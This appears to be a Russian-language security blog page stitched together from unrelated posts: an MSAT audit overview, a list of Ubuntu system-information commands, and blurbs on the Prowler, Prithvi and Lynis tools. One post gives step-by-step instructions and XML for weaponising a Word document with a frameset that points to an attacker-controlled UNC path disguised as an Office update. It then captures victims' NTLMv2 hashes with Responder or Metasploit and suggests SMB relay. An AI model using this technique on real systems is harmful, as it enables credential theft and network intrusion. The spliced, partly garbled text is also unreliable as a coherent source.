Многие наверно задавались вопросом “как проводить аудит информационной безопасности?  с чего начать? какую использовать методику ? существует ли специализированное программное обеспечения для этого? какие бесплатные программы есть для этого?

Сегодня мы представим вам продукт от компании Microsoft который позволяет провести аудит информационной безопасности Microsoft Secuity Assessment Tool (MSAT). Продукт позволяет выявить риски ИБ в уже существующей системе и дать рекомендации по их устранению. Как заверяют создатели приложение разработано для организаций с числом сотрудников менее 1000 человек, а также оно поможет лучше узнать персонал, процессы, ресурсы и технологии, направленные на обеспечение эффективного планирования мероприятий по безопасности и внедрение методов снижения риска в организации. Что самое приятное, приложение является бесплатным и его можно скачать с сайта разработчика. Данный продукт можно использовать в качестве опросного листа у специалистов ИТ, кадров, ИБ-шников.

Во время процедуры оценки риска, на основе ответом на вопросы, будет проверена среда ИТ по основным сферам угроз информационной безопасности. При оценке используется концепция эшелонированной защиты (DiD) для определения эффективности стратегии безопасности. Концепция “эшелонированной защиты” относится к реализации многоуровневой защиты, включающей технический, организационный и рабочий контроль. В основе средства оценки лежат общепринятые стандарты и передовой опыт, призванные снизить риски в системах информационных технологий. Процедуру оценки можно повторять, а также использовать для проверки прогресса в достижении организационных целей безопасности в инфраструктуре ИТ.

Чтобы выявить угрозы безопасности в системе ИТ вашей организации, в рамках определенных областей анализа будут оценены политики в отношении риска для бизнеса, технологий, процессов и персонала. После завершения оценки будут предоставлены рекомендации для управления этими рисками на основе признанных в отрасли передовых методик. Эти рекомендации призваны предоставить предварительные инструкции для помощи вашей организации во внедрении признанных в отрасли ИТ передовых методик.

Оценка риска состоит из двух частей: профиля риска для бизнеса (ПРБ) и оценки (включающей четыре области анализа). ПРБ представляет собой общие опасности, с которыми сталкивается компания. После выполнения этой оценки она остается неизменной, пока не будут выполнены коренные изменения в системе ИТ компании. Можно выполнить и сохранить несколько оценок. Эти оценки могут и должны изменяться с течением времени при принятии расширенных мер безопасности.

Итак давайте посмотрим, для начала создаем профиль:

И заполняем ответы на вопросы, по мере заполнения кнопки становятся зелеными:

После заполнения первого блока вопросов о параметрах компании наживаем : “Создание новой оценки”

После этого заполняем вопросы по ИТ-инфраструктуре, персоналу и управлению бизнесс-процессами:

После ответов ждем на иконку “Отчеты”

Отчет можно сохранить в *.docs или просматривать в приложении. Все читаем выводы, делаем рекомендации на основе лучших мировых практик, несем руководству, для согласования плана работ или обоснования закупки средств защиты информации)))))

Если вы хотите получить системную информацию из операционной системы Linux Ubuntu, вам нужно будет знать, какие команды вам нужно использовать – и для того, чтобы сделать ее намного проще для вас – мы сделали этот массовый список о том, как получить системную информацию о Linux Ubuntu.

Этот учебник будет работать с Ubuntu Linux 18.04.

Большинство команд системной информации также будут работать в более старых операционных системах Linux.

40 команд сбора информации о системе в Ubuntu Linux, которые помогут вам помочь.

1. Найти имя системного хоста
2. Отображение имени домена DNS системы
3. Отобразить полное доменное имя (FQDN) системы
4. Найдите серийный номер системы, производителя системы и название модели
5. Отображение информации об установленном оборудовании
6. Найти информацию о системном CPU
7. Найти информацию о основной памяти системы (ОЗУ)
8. Отображать статистику CPU (процессоров)
9. Показать статистику использования памяти в системе, включая общую установленную и использованную ОЗУ
10. Показывать количество свободной и используемой памяти в системе
11. Отображение объема памяти в мегабайтах
12. Отображение объема памяти в гигабайтах
13. Отображение объема памяти в терабайтах
14. Отображать читаемый пользователем вывод
15. Показывать использование пространства подкачки системы
16. Показать статистику виртуальной памяти системы
17. Найдите версию распространения Ubuntu Linux и соответствующую информацию
18. Найдите номер версии ядра системы
19. Найти параметры системного ядра
20. Найдите архитектуру ядра системы (32/64 бит)
21. Найти информацию о системном диске
22. Показать все установленные диски и размер
23. Отображение дискового пространства на файловой системе
24. Оценка использования файлового пространства
25. Отображение установленной файловой системы
26. Отображать устройства SCSI (или хосты) и их атрибуты в Linux
27. Отображать статистику ввода-вывода
28. Найдите информацию о системных PCI-устройствах
29. Найдите информацию о USB-устройствах системы
30. Найти информацию о беспроводных устройствах системы
31. Поиск информации о VGA / графических устройствах системы
32. Найти информацию о устройствах NVIDIA Graphics
33. Найти информацию о устройствах AMD / ATI Graphics
34. Какую версию Unity я запускаю?
35. Найдите информацию об аудиоустройствах системы
36. Узнайте, как долго система работает
37. Найти загрузку системы
38. Показать историю перезагрузки системы и завершения работы
39. Показывать уровень запуска
40. Показать историю команд

Найти имя системного хоста

• hostname
• cat /etc/hostname

Отображение имени домена DNS системы

• dnsdomainname

Отобразить полное доменное имя (FQDN) системы

• hostname -f

Найти серийный номер системы, производителя системы и название модели

• sudo dmidecode | more
• lshw | more
• sudo lshw -short

Отображение информации об установленном оборудовании

• sudo lsdev

Найти информацию о системном CPU

• cat /proc/cpuinfo
• lscpu

Отображать статистику CPU (процессоров)

• sudo mpstat
• sudo mpstat 1
• sudo mpstat -A

Найти информацию о основной памяти системы (ОЗУ)

Показать статистику использования памяти в системе, включая общую установленную и использованную ОЗУ

• less /proc/meminfo

Показывать количество свободной и используемой памяти в системе

• free

Отображение объема памяти в мегабайтах

• free -m

Отображение объема памяти в гигабайтах

• free -g

Отображение объема памяти в терабайтах

• free –tera

Отображать читаемый пользователем вывод

• free -h

Показывать использование пространства подкачки системы

• swapon -s
• cat /proc/swaps
• cat /proc/meminfo
• top

Показать статистику виртуальной памяти системы

• sudo vmstat
• sudo vmstat 1
• sudo vmstat 2

Найдите версию распространения Ubuntu Linux и соответствующую информацию

• lsb_release -a

Найдите номер версии ядра системы

• uname -r

Найти параметры системного ядра

• cat /proc/cmdline
• sysctl -a | more

Найдите архитектуру ядра системы (32/64 бит)

• uname -m
• getconf LONG_BIT
• arch

Найти информацию о системном диске

Показать все установленные диски и размер

• fdisk -l | grep ‘^Disk /dev’

Отображение дискового пространства на файловой системе

• df
• df -H
• df -HT

Оценка использования файлового пространства

• du
• du /home

Отображение установленной файловой системы

• cat /proc/mount
• mount

Отображать устройства SCSI (или хосты) и их атрибуты в Linux

• lsscsi

Отображать статистику ввода-вывода

• sudo iostat
• sudo iostat 2

Найдите информацию о системных PCI-устройствах

• lspci
• lspci -vt
• lspci -vvvn| less

Найдите информацию о USB-устройствах системы

• lsusb
• lsusb -vt

Найти информацию о беспроводных устройствах системы

• iwconfig
• watch -n 1 cat /proc/net/wireless
• wavemon

Поиск информации о VGA / графических устройствах системы

• lspci | grep -i vga
• lspci -vvnn | grep VGA
• sudo lshw -class display

Найти информацию о устройствах NVIDIA Graphics

Следующие команды работают только с двоичным драйвером Linux Nvidia:

• nvidia-smi
• nvidia-settings

Найти информацию о устройствах AMD / ATI Graphics

Следующая команда работает только с катализатором AMD

• fglrxinfo

Какую версию Unity я запускаю?

• unity –version

Найдите информацию об аудиоустройствах системы

• lspci | grep -i audio
• cat /proc/asound/cards
• arecord -l

Узнайте, как долго система работает

• uptime
• who
• w

Найти загрузку системы

• uptime
• cat /proc/loadavg
• sudo top
• sudo htop
• sudo atop

Показать историю перезагрузки системы и завершения работы

• last reboot
• last shutdown

Показывать уровень запуска

• runlevel
• who -r

Показать историю команд

• history

Описание

Prowler – это сканер уязвимостей сети, реализованный в кластере малины Pi, впервые разработанном во время Singapore Infosec Community Hackathon – HackSmith v1.0.

Возможности

• Сканировать сеть (конкретную подсеть или список IP-адресов) для всех IP-адресов, связанных с активными сетевыми устройствами

• Определите тип устройств, используюя фингерпринт

• Определите, есть ли на устройстве открытые порты

• Свяжите порты с общими службами

• Проверять устройства на основе словаря заводских настроек и общих учетных данных

• Уведомлять пользователей об уязвимостях безопасности через панель мониторинга. Обзор приборной панели

test_range = []



for i in range(0, 1):



for j in range(100, 200):



test_range.append("172.22." + str(i) + "." + str(j)) 

Офисные документы Microsoft играют жизненно важную роль в оценке этичного хакера или тестироващика на проникновение, поскольку обычно они используются, чтобы получить некоторую начальную точку опоры во внутренней сети клиента.

Пребывание под радаром также является ключевым элементом, и это может быть достигнуто только путем злоупотребления законными функциональными возможностями Windows или доверенного приложения, такого как офис Microsoft.

Исторически Microsoft Word использовался как HTML-редактор.

Это означает, что он может поддерживать HTML-элементы, такие как framesets.

Поэтому можно связать документ Microsoft Word с UNC-контуром и расчесывать его с помощью responder, чтобы захватывать хеши NTLM извне.

Документы Word с расширением docx представляют собой zip-файл, который содержит различные XML-документы.

Эти файлы XML управляют темой, шрифтами, настройками документа и веб-настройками.

Используя 7-zip, можно открыть этот архив, чтобы изучить эти файлы:

Папка слова содержит файл, который называется webSettings.xml.

Этот файл необходимо изменить, чтобы включить набор фреймов.

<w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

Новый файл webSettings.xml, содержащий набор фреймов, должен быть добавлен обратно в архив, чтобы предыдущая версия была перезаписана.

Необходимо создать новый файл (webSettings.xml.rels), чтобы содержать идентификатор отношения (rId1) UNC-путь и TargetMode, если он является внешним или внутренним.

 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships

xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>

</Relationships> 

Каталог _rels содержит связанные отношения документа с точки зрения шрифтов, стилей, тем, настроек и т. д.

Посадка нового файла в этом каталоге завершит связь отношений, которая была создана ранее через набор фреймов.

Теперь, когда документ Word был вооружен для подключения к UNC-пути через Интернет, responder может быть настроен для захвата хешей NTLM.

Как только целевой пользователь откроет документ документа, он попытается подключиться к UNC-пути.

Ответчик получит хэш NTLMv2 пользователя.

В качестве альтернативы Metasploit Framework может использоваться вместо ответчика, чтобы захватить хэш пароля.

 auxiliary/server/capture/smb 

Хеши NTLMv2 будут записаны в Metasploit после открытия документа.

Вывод

Этот метод позволяет атакующему захватить хэши паролей домена у пользователей, которые могут привести к внутреннему доступу к сети, если двухфакторная аутентификация для доступа к VPN не включена и существует слабая политика паролей.

Кроме того, если целевой пользователь является повышенной учетной записью, такой как локальный администратор или администратор домена, этот метод можно комбинировать с реле SMB, чтобы получить сеанс Meterpreter.

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Инструмент создания отчетов для оценки безопасности

Использование

Этот проект может быть использован для создания отчетов и очень прост в использовании.

Он включает следующии функции:

1. Мы можем добавить типы и рекомендации Owasp с подробной информацией.
   
   
2. Мы можем добавить несколько проектов и работать над ним отдельно.
   
   
3. Мы можем добавить множество уязвимостей в разные проекты с доказательством концепции.
   
   
4. При генерации отчета он предоставляет файл документа (.docx).
   
   
5. В настоящее время разработчики пытаются добавить дополнительные средства, такие как Chart, и скоро будут обновлены.

Установка и настройка

1. Создайте отчет базы данных на сервере (мы использовали XAMPP).
   
   
2. Импортируйте report.sql на свой локальный сервер.
   
   
3. Загрузите весь исходник и извлеките node_modules.
   
   
4. Запустите index.js и наслаждайтесь.
   
   
5. Следите за блогом разработчиков за подробностями

Используемые технологии

• Angularjs для интерфейса
  
  
• MySQL как база данных
  
  
• NodeJS (ExpressJS) как наш бэкэнд

Вы можете просмотреть руководство по использованию эьлшл программного обеспечения https://youtu.be/eh7UnuQOYiU.

Вы также можете просмотреть о нем в блоге и прокомментировать свое мнение по адресу https://www.vegabird.com/prithvi.

Скачать Prithvi

Мы рады сообщить об этом крупном выпуске инструмента аудита Lynis.

Несколько существенных изменений были внесены в основные функции Lynis.

Эти изменения являются следующим улучшением, которое мы сделали. Существует риск нарушения существующей конфигурации.

Lynis – это инструмент аудита безопасности с открытым исходным кодом.

Используется системными администраторами, специалистами по безопасности и аудиторами для оценки защиты системы Linux и UNIX.

Он работает на самом хосте, поэтому он выполняет более обширные проверки безопасности, чем сканеры уязвимостей.

Поддерживаемые операционные системы

Инструмент практически не имеет зависимостей, поэтому он работает практически со всеми системами и версиями на базе Unix, в том числе:

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• и другими

Он работает даже на таких системах, как Raspberry Pi и подобных устройствах хранения данных!

Например, если он видит, что вы используете Apache, он выполнит начальный раунд тестов, связанных с Apache.

Когда во время сканирования Apache он также обнаруживает конфигурацию SSL / TLS, он будет выполнять дополнительные шаги аудита.

При этом он будет собирать обнаруженные сертификаты, чтобы впоследствии их можно было отсканировать.

Углубленное сканирование безопасности

Выполняя оппортунистическое сканирование, инструмент может работать практически без зависимостей.

Чем больше он найдет, тем глубже будет аудит.

Другими словами, Lynis всегда будет выполнять сканирование, настроенное для вашей системы.

Никакой аудит не будет таким же!

Случаи использования

Поскольку Lynis является гибким, он используется для различных целей.

Типичные варианты использования Lynis включают:

• Аудит безопасности
  
  
• Тестирование соответствия (например, PCI, HIPAA, SOx)
  
  
• Обнаружение уязвимости и сканирование
  
  
• Улучшение безопасности системы

Ресурсы, используемые для тестирования

Поскольку Lynis не ограничивается несколькими распространенными дистрибутивами Linux, он использует тесты из стандартов и многопользовательские, которые вы не найдены ни в одном другом инструменте.

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Руководства и рекомендации поставщиков (например, Debian Gentoo, Red Hat)

Плагины Lynis

Плагины позволяют инструменту выполнять дополнительные тесты.

Их можно рассматривать как расширение (или дополнение) к Lynis, которые улучшают его функциональность.

Одним из примеров является плагин проверки соответствия, который выполняет конкретные тесты, применимые только к некоторому стандарту.

Изменения

 Changes:

--------

* Tests can have more than 1 required OS (e.g. Linux OR NetBSD)

* Added 'system-groups' option to profile (Enterprise users)

* Overhaul of default profile and migrate to new style (setting=value)

* Show warning if old profile options are used

* Improved detection of binaries

* New group 'usb' for tests related to USB devices



Tests:

------

* [FILE-6363] - New test for /var/tmp (sticky bit)

* [MAIL-8802] - Added exim4 process name to improve detection of Exim

* [NETW-3030] - Changed name of dhcp client name process and added udhcpc

* [SSH-7408] - Restored UsePrivilegeSeparation

* [TIME-3170] - Added chrony configuration file for NetBSD 

Скачать Lynis 2.6.1